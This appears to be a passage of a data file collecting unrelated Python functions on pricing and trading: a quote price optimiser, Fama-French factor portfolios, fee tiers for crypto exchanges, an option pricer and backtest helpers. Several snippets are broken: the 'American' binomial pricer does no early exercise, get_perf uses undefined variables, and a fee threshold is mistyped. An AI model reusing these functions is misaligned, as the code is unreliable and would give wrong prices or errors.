section creates columns for statistics\r\n quote_df.loc[:,'PredictedQuotePricePofL'] = ''\r\n quote_df.loc[:,'PredictedQuotePrice'] = ''\r\n #this section is for COP (Customized Optimal Price)\r\n # - L, M, H price points\r\n quote_df.loc[:,'COPComLowPrice'] = ''\r\n quote_df.loc[:,'COPComMedPrice'] = ''\r\n quote_df.loc[:,'COPComHighPrice'] = ''\r\n # - L, M, H price points as a % of List\r\n quote_df.loc[:,'COPComLowPofL'] = ''\r\n quote_df.loc[:,'COPComMedPofL'] = ''\r\n quote_df.loc[:,'COPComHighPofL'] = ''\r\n # - optimal prices and win probabilities\r\n quote_df.loc[:,'COPOptimalPrice'] = ''\r\n quote_df.loc[:,'COPOptimalPricePofL'] = ''\r\n quote_df.loc[:,'COPOptimalPriceWinProb'] = ''\r\n quote_df.loc[:,'COPOptimalPriceGP'] = ''\r\n quote_df.loc[:,'COPOptimalPriceExpectedGP'] = ''\r\n quote_df.loc[:,'COPOptimalPriceIntervalLow'] = ''\r\n quote_df.loc[:,'COPOptimalPriceIntervalHigh'] = ''\r\n # - quoted price data within customized optimal price (COP)\r\n quote_df.loc[:,'COPQuotePriceWinProb'] = ''\r\n quote_df.loc[:,'COPQuotePriceGP'] = ''\r\n quote_df.loc[:,'COPQuotePriceExpectedGP'] = ''\r\n \r\n #this section determines all of the column data needed for optimal price calculation\r\n #this determines the segment tree node to be used for each component of the quote\r\n column_headings = list(cols[column_nums])\r\n #seg_df.set_index(column_headings, inplace = True)\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n column_values = list(quote_df.loc[i,column_headings])\r\n #print column_values\r\n works = False\r\n j = -1\r\n while works == False: #this finds the most specific valid node in the component segment tree\r\n try:\r\n Low_m = float(seg_df.loc[tuple(column_values), 'Low_m'])\r\n Low_b = float(seg_df.loc[tuple(column_values), 'Low_b'])\r\n Med_m = float(seg_df.loc[tuple(column_values), 'Med_m'])\r\n Med_b = float(seg_df.loc[tuple(column_values), 'Med_b'])\r\n High_m = float(seg_df.loc[tuple(column_values), 'High_m'])\r\n High_b = float(seg_df.loc[tuple(column_values), 'High_b'])\r\n Tree_Node = [seg_df.index.get_loc(tuple(column_values))][0]\r\n works = True\r\n except KeyError:\r\n column_values[j] = ''\r\n j -= 1\r\n \r\n #this calculates the low, med, and high (%ofList) price points\r\n x = quote_df.loc[i,x_col]\r\n low = Low_m * x + Low_b\r\n med = Med_m * x + Med_b\r\n high = High_m * x + High_b \r\n low,med,high = BPF.PriceAdj(low, med, high) #this makes any needed adjustments to the low, med, and high price points to eliminate anomolies\r\n #this writes the low, med, and high to the quote_df\r\n quote_df.loc[i,'ComLowPofL'] = low\r\n quote_df.loc[i,'ComMedPofL'] = med\r\n quote_df.loc[i,'ComHighPofL'] = high\r\n quote_df.loc[i,'TreeNode'] = Tree_Node\r\n #print 'Component Row, Tree_Node, & ComMedPofL: ', i, Tree_Node, med\r\n \r\n #this calculates and sets the ComMedPrice\r\n quote_df.loc[:,'ComMedPrice'] = (quote_df[ref_prc_col] * quote_df['ComMedPofL'])#.round(decimals = 2)\r\n #this calculates and sets the DealSize\r\n quote_df.loc[:,'DealSize'] = quote_df['ComMedPrice'].sum().round(decimals = 2)\r\n #this calculates and sets the Log of the DealSize\r\n quote_df.loc[:,'LogDealSize'] = np.log10(quote_df['DealSize'].astype(float))\r\n #this calculates the component's percent price contribution to the quote (based on component median price)\r\n quote_df.loc[:,'ComPctContrib'] = quote_df['ComMedPrice'] / quote_df['DealSize']\r\n \r\n #this section calculates the adjusted L, M, H values\r\n seg_df.reset_index(inplace = True)\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n #set adjusted values for low and high to match original values for low and high\r\n adjlow = quote_df.loc[i,'ComLowPofL']\r\n adjhigh = quote_df.loc[i,'ComHighPofL']\r\n #adjust median point in price sensitivity curve for quote level attributes\r\n adjmed = 0\r\n for j in range(len(quote_attribute_cols)): #this calculates the value of the multiple linear regression\r\n adjmed += quote_df.loc[i, quote_attribute_cols[j]] * seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_' + quote_attribute_cols[j]]\r\n #print 'Factors: ',i,j,quote_df.loc[i, quote_attribute_cols[j]], seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_' + quote_attribute_cols[j]]\r\n if y_intercept == True:\r\n adjmed += seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_intercept']\r\n #adjust median point in price sensitivity curve for skew in data\r\n quote_df.loc[i, 'PredictedQuotePricePofL'] = adjmed\r\n quote_df.loc[i, 'PredictedQuotePrice'] = adjmed * quote_df.loc[i, 'ComListPrice']\r\n adjmed += seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_YtoMedPofL']\r\n #adjust all points in price sensitivity curve for bias from using win data only\r\n adj = seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_psych']\r\n adjlow *= adj\r\n adjmed *= adj\r\n adjhigh *= adj\r\n #adjust all points in price sensitivity curve for brand input\r\n adj = seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_InputByBrand']\r\n adjlow += adj\r\n adjmed += adj\r\n adjhigh += adj\r\n adjlow,adjmed,adjhigh = BPF.PriceAdj(adjlow, adjmed, adjhigh) #this makes any needed adjustments to the low, med, and high price points to eliminate anomolies\r\n #store adjusted values\r\n quote_df.loc[i, 'AdjComLowPofL'] = adjlow\r\n quote_df.loc[i, 'AdjComMedPofL'] = adjmed\r\n quote_df.loc[i, 'AdjComHighPofL'] = adjhigh\r\n ListPrice = quote_df.loc[i, 'ComListPrice']\r\n quote_df.loc[i, 'AdjComLowPrice'] = adjlow * ListPrice\r\n quote_df.loc[i, 'AdjComMedPrice'] = adjmed * ListPrice\r\n quote_df.loc[i, 'AdjComHighPrice'] = adjhigh * ListPrice\r\n \r\n #this section calculates the optimal price data\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n L = quote_df.loc[i,'AdjComLowPofL']\r\n M = quote_df.loc[i,'AdjComMedPofL']\r\n H = quote_df.loc[i,'AdjComHighPofL']\r\n Cf = 1.0 * quote_df.loc[i,'ComTMC'] / quote_df.loc[i,'ComListPrice']\r\n quote_df.loc[i, 'ComTMCPofL'] = Cf\r\n quote_df.loc[i, 'OptimalPricePofL'] = BPF.OptPrice(L, M, H, Cf, 0, 0, 0)\r\n quote_df.loc[i, 'OptimalPrice'] = quote_df.loc[i, 'OptimalPricePofL'] * quote_df.loc[i, 'ComListPrice']\r\n quote_df.loc[i, 'OptimalPriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'OptimalPricePofL'], L, M, H)\r\n quote_df.loc[i, 'OptimalPriceGP'] = quote_df.loc[i, 'OptimalPrice'] - quote_df.loc[i,'ComTMC']\r\n quote_df.loc[i, 'OptimalPriceExpectedGP'] = quote_df.loc[i, 'OptimalPriceGP'] * quote_df.loc[i, 'OptimalPriceWinProb']\r\n quote_df.loc[i, 'OptimalPriceIntervalLow'], quote_df.loc[i, 'OptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(quote_df.loc[i, 'OptimalPrice'], quote_df.loc[i,'AdjComLowPrice'], quote_df.loc[i,'AdjComMedPrice'], quote_df.loc[i,'AdjComHighPrice'], quote_df.loc[i, 'ComTMC'])\r\n #this section shows quoted (i.e. requested) price data\r\n quote_df.loc[i, 'QuotePricePofL'] = quote_df.loc[i, 'ComQuotePricePofL']\r\n quote_df.loc[i, 'QuotePrice'] = quote_df.loc[i, 'ComQuotePrice']\r\n quote_df.loc[i, 'QuotePriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'QuotePricePofL'], L, M, H)\r\n quote_df.loc[i, 'QuotePriceGP'] = quote_df.loc[i, 'QuotePrice'] - quote_df.loc[i,'ComTMC']\r\n quote_df.loc[i, 'QuotePriceExpectedGP'] = quote_df.loc[i, 'QuotePriceGP'] * quote_df.loc[i, 'QuotePriceWinProb']\r\n \r\n #this section calculates the Customized Optimal Price (COP) data\r\n if (COP_h > COP_m) and (COP_m > COP_l):\r\n Lt = quote_df['AdjComLowPrice'].sum()\r\n Mt = quote_df['AdjComMedPrice'].sum()\r\n Ht = quote_df['AdjComHighPrice'].sum()\r\n LISTt = quote_df['ComListPrice'].sum()\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n Li = quote_df.loc[i, 'AdjComLowPrice'].round(decimals=2)\r\n Mi = quote_df.loc[i, 'AdjComMedPrice'].round(decimals=2)\r\n Hi = quote_df.loc[i, 'AdjComHighPrice'].round(decimals=2)\r\n LISTi = quote_df.loc[i, 'ComListPrice'].round(decimals=2)\r\n #this section uses linear interpolation for setting COP component prices from the bottom line price\r\n quote_df.loc[i, 'COPComLowPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_l, Li, Mi, Hi, LISTi).round(decimals=2)\r\n quote_df.loc[i, 'COPComMedPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_m, Li, Mi, Hi, LISTi).round(decimals=2)\r\n quote_df.loc[i, 'COPComHighPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_h, Li, Mi, Hi, LISTi).round(decimals=2)\r\n #this section calculate the COP PofL prices\r\n quote_df.loc[i, 'COPComLowPofL'] = quote_df.loc[i, 'COPComLowPrice'] / LISTi\r\n quote_df.loc[i, 'COPComMedPofL'] = quote_df.loc[i, 'COPComMedPrice'] / LISTi\r\n quote_df.loc[i, 'COPComHighPofL'] = quote_df.loc[i, 'COPComHighPrice'] / LISTi\r\n #this section calculate the COP optimal prices, win probabilities, and profitability\r\n quote_df.loc[i, 'COPOptimalPrice'] = BPF.OptPrice(quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'], quote_df.loc[i, 'ComTMC'], 0, 0, 0).round(decimals=2)\r\n quote_df.loc[i, 'COPOptimalPricePofL'] = quote_df.loc[i, 'COPOptimalPrice'] / LISTi\r\n quote_df.loc[i, 'COPOptimalPriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'COPOptimalPrice'], quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'])\r\n quote_df.loc[i, 'COPOptimalPriceGP'] = quote_df.loc[i, 'COPOptimalPrice'] - quote_df.loc[i, 'ComTMC']\r\n quote_df.loc[i, 'COPOptimalPriceExpectedGP'] = (quote_df.loc[i, 'COPOptimalPriceGP'] * quote_df.loc[i, 'COPOptimalPriceWinProb']).round(decimals=2)\r\n quote_df.loc[i, 'COPOptimalPriceIntervalLow'], quote_df.loc[i, 'COPOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(quote_df.loc[i, 'COPOptimalPrice'], quote_df.loc[i,'COPComLowPrice'], quote_df.loc[i,'COPComMedPrice'], quote_df.loc[i,'COPComHighPrice'], quote_df.loc[i, 'ComTMC'])\r\n #this section calculates the quoted price statistics given the COP prices\r\n quote_df.loc[i, 'COPQuotePriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'QuotePrice'], quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'])\r\n quote_df.loc[i, 'COPQuotePriceGP'] = quote_df.loc[i, 'QuotePriceGP']\r\n quote_df.loc[i, 'COPQuotePriceExpectedGP'] = quote_df.loc[i, 'COPQuotePriceGP'] * quote_df.loc[i, 'COPQuotePriceWinProb']\r\n print; print ' quote_df update complete'\r\n \r\n \r\n #this section calculates the total deal values\r\n # this section contains general quote totals\r\n total_deal_stats = pd.Series('', index=[' General Total Quote Data'])\r\n total_deal_stats['DealListPrice'] = quote_df['ComListPrice'].sum()\r\n total_deal_stats['DealSize'] = quote_df['ComMedPrice'].sum().round(decimals=2)\r\n total_deal_stats['DealTMC'] = quote_df['ComTMC'].sum()\r\n total_deal_stats['DealPredictedQuotePrice'] = quote_df['PredictedQuotePrice'].sum().round(decimals=0)\r\n # this section contains Price Range Data (Line Item Sum)\r\n total_deal_stats[' Price Range Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealAdjLowPrice'] = quote_df['AdjComLowPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealAdjMedPrice'] = quote_df['AdjComMedPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealAdjHighPrice'] = quote_df['AdjComHighPrice'].sum().round(decimals=0)\r\n # this section contains Quoted Price Data (Line Item Sum)\r\n total_deal_stats[' Quoted Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealQuotePrice'] = quote_df['ComQuotePrice'].sum()\r\n total_deal_stats['DealQuotePriceWinProb'] = ''\r\n total_deal_stats['DealQuotePriceGP'] = total_deal_stats['DealQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealQuotePriceExpectedGP'] = quote_df['QuotePriceExpectedGP'].sum()\r\n total_deal_stats['DealQuotePriceWinProb'] = total_deal_stats['DealQuotePriceExpectedGP'] / total_deal_stats['DealQuotePriceGP']\r\n # this section contains optimal price data\r\n total_deal_stats[' Optimal Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealOptimalPrice'] = quote_df['OptimalPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealOptimalPriceWinProb'] = ''\r\n total_deal_stats['DealOptimalPriceGP'] = quote_df['OptimalPriceGP'].sum().round(decimals=2)\r\n total_deal_stats['DealOptimalPriceExpectedGP'] = quote_df['OptimalPriceExpectedGP'].sum().round(decimals=2)\r\n total_deal_stats['DealOptimalPriceWinProb'] = total_deal_stats['DealOptimalPriceExpectedGP'] / total_deal_stats['DealOptimalPriceGP']\r\n total_deal_stats['DealOptimalPriceIntervalLow'] = quote_df['OptimalPriceIntervalLow'].sum().round(decimals=0)\r\n total_deal_stats['DealOptimalPriceIntervalHigh'] = quote_df['OptimalPriceIntervalHigh'].sum().round(decimals=0)\r\n # this section contains Quoted Price Data (Bottom-Line)\r\n total_deal_stats[' Quoted Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealBotLineQuotePrice'] = total_deal_stats['DealQuotePrice']\r\n total_deal_stats['DealBotLineQuotePriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealBotLineQuotePrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'])\r\n total_deal_stats['DealBotLineQuotePriceGP'] = total_deal_stats['DealBotLineQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealBotLineQuotePriceExpectedGP'] = total_deal_stats['DealBotLineQuotePriceGP'] * total_deal_stats['DealBotLineQuotePriceWinProb']\r\n # this section contains Optimal Price Data (Bottom-Line)\r\n total_deal_stats[' Optimal Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealBotLineOptimalPrice'] = BPF.OptPrice(total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'], total_deal_stats['DealTMC'], 0, 0, 0)\r\n total_deal_stats['DealBotLineOptimalPriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealBotLineOptimalPrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'])\r\n total_deal_stats['DealBotLineOptimalPriceGP'] = total_deal_stats['DealBotLineOptimalPrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealBotLineOptimalPriceExpectedGP'] = total_deal_stats['DealBotLineOptimalPriceGP'] * total_deal_stats['DealBotLineOptimalPriceWinProb']\r\n total_deal_stats['DealBotLineOptimalPriceIntervalLow'], total_deal_stats['DealBotLineOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(total_deal_stats['DealBotLineOptimalPrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'], total_deal_stats['DealTMC'])\r\n \r\n #this section is executed only if customized optimal pricing (COP) is needed\r\n if (COP_h > COP_m) and (COP_m > COP_l):\r\n # this section contains COP Price Range Data (Line Item Sum)\r\n total_deal_stats[' COP Price Range Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPLowPrice'] = quote_df['COPComLowPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPMedPrice'] = quote_df['COPComMedPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPHighPrice'] = quote_df['COPComHighPrice'].sum().round(decimals=0)\r\n # this section contains COP Quote Price Data (Line Item Sum)\r\n total_deal_stats[' COP Quote Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPQuotePrice'] = quote_df['ComQuotePrice'].sum()\r\n total_deal_stats['DealCOPQuotePriceWinProb'] = ''\r\n total_deal_stats['DealCOPQuotePriceGP'] = quote_df['COPQuotePriceGP'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPQuotePriceExpectedGP'] = quote_df['COPQuotePriceExpectedGP'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPQuotePriceWinProb'] = total_deal_stats['DealCOPQuotePriceExpectedGP'] / total_deal_stats['DealCOPQuotePriceGP']\r\n # this section contains COP Optimal Price Data (Line Item Sum)\r\n total_deal_stats[' COP Optimal Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPOptimalPrice'] = quote_df['COPOptimalPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPOptimalPriceWinProb'] = ''\r\n total_deal_stats['DealCOPOptimalPriceGP'] = quote_df['COPOptimalPriceGP'].sum().round(decimals=2)\r\n total_deal_stats['DealCOPOptimalPriceExpectedGP'] = quote_df['COPOptimalPriceExpectedGP'].sum().round(decimals=2)\r\n total_deal_stats['DealCOPOptimalPriceWinProb'] = total_deal_stats['DealCOPOptimalPriceExpectedGP'] / total_deal_stats['DealCOPOptimalPriceGP']\r\n total_deal_stats['DealCOPOptimalPriceIntervalLow'] = quote_df['COPOptimalPriceIntervalLow'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPOptimalPriceIntervalHigh'] = quote_df['COPOptimalPriceIntervalHigh'].sum().round(decimals=0)\r\n # this section contains quoted price data within the Customized Optimal Price (COP) estimates\r\n total_deal_stats[' COP Quote Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealCOPBotLineQuotePrice'] = total_deal_stats['DealQuotePrice']\r\n total_deal_stats['DealCOPBotLineQuotePriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealCOPQuotePrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'])\r\n total_deal_stats['DealCOPBotLineQuotePriceGP'] = total_deal_stats['DealCOPBotLineQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealCOPBotLineQuotePriceExpectedGP'] = total_deal_stats['DealCOPBotLineQuotePriceGP'] *total_deal_stats['DealCOPBotLineQuotePriceWinProb']\r\n # this section contains COP Optimal Price Data (Bottom-Line)\r\n total_deal_stats[' COP Optimal Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealCOPBotLineOptimalPrice'] = BPF.OptPrice(total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'], total_deal_stats['DealTMC'], 0, 0, 0).round(decimals=0)\r\n total_deal_stats['DealCOPBotLineOptimalPriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealCOPBotLineOptimalPrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'])\r\n total_deal_stats['DealCOPBotLineOptimalPriceGP'] = total_deal_stats['DealCOPBotLineOptimalPrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealCOPBotLineOptimalPriceExpectedGP'] = total_deal_stats['DealCOPBotLineOptimalPriceGP'] * total_deal_stats['DealCOPBotLineOptimalPriceWinProb']\r\n total_deal_stats['DealCOPBotLineOptimalPriceIntervalLow'], total_deal_stats['DealCOPBotLineOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(total_deal_stats['DealCOPBotLineOptimalPrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'], total_deal_stats['DealTMC'])\r\n \r\n print ' total_deal_stats creation complete'\r\n \r\n #This stores copies of the returned data\r\n quote_df.to_csv(data_path + 'quote_return.csv')\r\n total_deal_stats.to_csv(data_path + 'total_deal_stats_return.csv') \r\n \r\n end_time = time.time() #stop a timer\r\n print 'Elapsed time (milliseconds): ', int(1000 * (end_time - start_time))\r\n \r\n return quote_df, total_deal_stats", "def before_trading_start(context, data):\n factors = pipeline_output('ff_example')\n\n # get the data we're going to use\n returns = factors['returns']\n mkt_cap = factors.sort_values(['market_cap'], ascending=True)\n be_me = factors.sort_values(['be_me'], ascending=True)\n\n # to compose the six portfolios, split our universe into portions\n half = int(len(mkt_cap)*0.5)\n small_caps = mkt_cap[:half]\n big_caps = mkt_cap[half:]\n \n thirty = int(len(be_me)*0.3)\n seventy = int(len(be_me)*0.7)\n growth = be_me[:thirty]\n neutral = be_me[thirty:seventy]\n value = be_me[seventy:]\n\n # now use the portions to construct the portfolios.\n # note: these portfolios are just lists (indices) of equities\n small_value = small_caps.index.intersection(value.index)\n small_neutral = small_caps.index.intersection(neutral.index)\n small_growth = small_caps.index.intersection(growth.index)\n \n big_value = big_caps.index.intersection(value.index)\n big_neutral = big_caps.index.intersection(neutral.index)\n big_growth = big_caps.index.intersection(growth.index)\n\n # take the mean to get the portfolio return, assuming uniform\n # allocation to its constituent equities.\n sv = returns[small_value].mean()\n sn = returns[small_neutral].mean()\n sg = returns[small_growth].mean()\n \n bv = returns[big_value].mean()\n bn = returns[big_neutral].mean()\n bg = returns[big_growth].mean()\n\n # computing SMB\n context.smb = (sv + sn + sg)/3 - (bv + bn + bg)/3\n\n # computing HML\n context.hml = (sv + bv)/2 - (sg + bg)/2", "def update_price_model(self, good, order_type, is_successful, clearing_price=0):\n\n SIGNIFICANT = 0.25 # 25% more or less is \"significant\"\n SIG_IMBALANCE = 0.33\n LOW_INVENTORY = 0.1 # 10% of ideal inventory = \"LOW\"\n HIGH_INVENTORY = 2.0 # 200% of ideal inventory = \"HIGH\"\n MIN_PRICE = 0.01 # lowest allowed price of a Good\n\n if is_successful:\n # add this trade to the observed trading range\n self.observed_trading_range[good].append(clearing_price)\n\n public_mean_price = self.market.mean_price(good)\n belief = self.price_belief[good]\n mean = belief.mean()\n wobble = 0.05 # the degree which the Pop should bid outside the belief\n\n # how different the public mean price is from the price belief\n delta_to_mean = mean - public_mean_price\n\n if is_successful:\n if order_type is OrderType.buy_order and delta_to_mean > SIGNIFICANT:\n # this Pop overpaid, shift belief towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:\n # this Pop underpaid!, shift belief towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n # increase the belief's certainty\n belief.low += wobble * mean\n belief.high -= wobble * mean\n\n else:\n # shift towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n # check for inventory special cases\n stocks = self.inventory.get_amount(good)\n ideal = self.inventory.get_ideal(good)\n\n # if we're buying and inventory is too low\n # meaning we're desperate to buy\n if order_type is OrderType.buy_order and stocks < LOW_INVENTORY * ideal:\n wobble *= 2\n\n # if we're selling and inventory is too high\n # meaning we're desperate to sell\n elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:\n wobble *= 2\n # all other cases\n else:\n sells = self.market.history.sell_orders.average(good, 1)\n buys = self.market.history.buy_orders.average(good, 1)\n\n # TODO: figure out why this is sometimes 0\n if sells + buys > 0:\n\n supply_vs_demand = (sells - buys) / (sells + buys)\n\n if supply_vs_demand > SIG_IMBALANCE or supply_vs_demand < -SIG_IMBALANCE:\n # too much supply? lower bid lower to sell faster\n # too much demand? raise price to buy faster\n\n new_mean = public_mean_price * (1 - supply_vs_demand)\n delta_to_mean = mean - new_mean\n\n # shift the price belief to the new price mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n\n # decrease belief's certainty since we've just changed it (we could be wrong)\n belief.low -= wobble * mean\n belief.high += wobble * mean\n\n # make sure the price belief doesn't decrease below the minimum\n if belief.low < MIN_PRICE:\n belief.low = MIN_PRICE\n elif belief.high < MIN_PRICE:\n belief.high = MIN_PRICE", "def add_average_discount_to_target(data):\n\n data['adj_price'] = data.price.map(lambda x: (x - x * 0.05))\n data['adj_price_sqrm'] = data.price_sqrm.map(lambda x: (x - x * 0.05))\n\n return data", "def AmericanBinomialPricer(pricing_engine, option, data):\r\n\r\n\r\n expiry = option.expiry\r\n strike = option.strike\r\n (spot, rate, volatility, dividend) = data.get_data()\r\n steps = pricing_engine.steps\r\n nodes = steps + 1\r\n dt = expiry / steps \r\n u = np.exp((rate * dt) + volatility * np.sqrt(dt)) \r\n d = np.exp((rate * dt) - volatility * np.sqrt(dt))\r\n pu = (np.exp(rate * dt) - d) / (u - d)\r\n pd = 1 - pu\r\n disc = np.exp(-rate * expiry)\r\n spotT = 0.0\r\n payoffT = 0.0\r\n callT = 0.0\r\n putT= 0.0\r\n #call\r\n for i in range(nodes):\r\n spotT = spot * (u ** (steps - i)) * (d ** (i))\r\n payoffT += option.payoff(spotT) * binom.pmf(steps - i, steps, pu) \r\n spotT = spotT/d\r\n callT = max(callT, spotT-strike)\r\n price = disc * payoffT\r\n #put\r\n for i in range(nodes):\r\n spotT = spot * (u ** (steps - i)) * (d ** (i))\r\n payoffT += option.payoff(spotT) * binom.pmf(steps - i, steps, pu) \r\n spotT = spotT/d\r\n putT = max(putT, strike-spot)\r\n price = disc * payoffT\r\n \r\n return price", "def field_buy(self, symbol):\r\n\r\n end_percent = 150\r\n current_price = 15#self.get_price()\r\n self.log(current_price)\r\n buys = {}\r\n new_price = current_price * 1.05\r\n while (new_price / current_price) > 150:\r\n self.log(\"New sell at: {}\".format(new_price))\r\n new_price *= 1.05\r\n\r\n self.log(buys)\r\n\r\n return buys", "def get_perf(self) :\n self.train()\n\n prediction = self.clf.predict(self.df_test.drop(columns = 'up')[:-1])\n self.accuracy = accuracy_score(df_test['up'][length:].values, prediction)\n tn, fp, fn, tp = confusion_matrix(df_test['up'][length:].values, prediction).ravel()\n self.recall = tp/(tp+fn)\n self.specificity = tn / (tn+fp)\n\n\n self.df_true = self.df_true[self.length:]\n\n profit = 1\n mini = 1\n maxi = 1\n self.df_true['close'] = self.df_true['close'].map(lambda x : np.exp(x))\n for s in range(1,len(self.df_true)):\n if prediction[x-1] == 1 :\n result = ((self.df_true['close'].iloc[s] -self.df_true['close'].iloc[s-1]) / self.df_true['close'].iloc[s-1]) + 1\n profit = profit * result\n if result < mini :\n mini = result\n if maxi < result :\n maxi = result\n self.mini = mini\n self.maxi = maxi\n self.profit = profit", "def conversion_rate(self, price):\n\n price = ( price - 20 ) / 2\n\n a = self.a_conversion_rate\n b = self.b_conversion_rate\n c = self.c_conversion_rate\n d = self.d_conversion_rate\n e = self.e_conversion_rate\n # price_min = self.price_min\n # Probabilities of conversion given a price\n return c * np.exp ( a * ( price - e) ** (1/ (2 * b) ) ) * (d - 2*price) ** (3/2)", "def calc_base_year_data(base_year_vehicles_df):\n pass", "def get_fee_pct(self, contract_type: str) -> Tuple[float, float]:\n if contract_type == 'forex':\n return (0.00002, 0.00002)\n elif contract_type == 'crypto':\n if self.CRYPTO_EXCHANGE == 'binance':\n if self.trade_volume < 50_000:\n return (.001, .001)\n elif self.trade_volume < 100_000:\n return (.0009, .0009)\n elif self.trade_volume < 5000_000:\n return (.0009, .0008)\n elif self.trade_volume < 1_000_000:\n return (.0008, .0007)\n elif self.trade_volume < 5_000_000:\n return (.0007, .0005)\n elif self.trade_volume < 10_000_000:\n return (.0006, .0004)\n elif self.trade_volume < 25_000_000:\n return (.0006, 0)\n elif self.trade_volume < 100_000_000:\n return (.0005, 0)\n elif self.trade_volume < 250_000_000:\n return (.0004, 0)\n elif self.trade_volume < 500_000_000:\n return (.0003, 0)\n else: return (.0002, 0)\n elif self.CRYPTO_EXCHANGE == 'kraken':\n if self.trade_volume < 50_000:\n return (.0026, .0016)\n elif self.trade_volume < 100_000:\n return (.0024, .0014)\n elif self.trade_volume < 250_000:\n return (.0022, .0012)\n elif self.trade_volume < 500_000:\n return (.002, .001)\n elif self.trade_volume < 1_000_000:\n return (.0018, .0008)\n elif self.trade_volume < 2_500_000:\n return (.0016, .0006)\n elif self.trade_volume < 5_000_000:\n return (.0014, .0004)\n elif self.trade_volume < 10_000_000:\n return (.0012, .0002)\n else: return (.001, 0)\n elif self.CRYPTO_EXCHANGE == 'coinbase':\n if self.trade_volume < 10_000:\n return (.005, .005)\n elif self.trade_volume < 50_000:\n return (.0035, .0035)\n elif self.trade_volume < 100_000:\n return (.0025, .0015)\n elif self.trade_volume < 1_000_000:\n return (.002, .001)\n elif self.trade_volume < 10_000_000:\n return (.0018, .0008)\n elif self.trade_volume < 50_000_000:\n return (.0015, .0005)\n elif self.trade_volume < 300_000_000:\n return (.0007, 0)\n elif self.trade_volume < 500_000_000:\n return (.0005, 0)\n else: return (.0004, 0)\n elif self.CRYPTO_EXCHANGE == 'robinhood':\n return (0.0001, 0.0001)\n return (0, 0)", "def calc_earning(self, data=None):\n result = Result()\n if data is None:\n data = self.security\n self.calcDecision()\n first_purchase_method = self.check_first_purchase_method()\n for i in np.arange(len(data['Close'])):\n if data['FinalDecision'].iloc[i] is None:\n pass\n elif data['FinalDecision'].iloc[i] == TransactionType.BUY:\n if 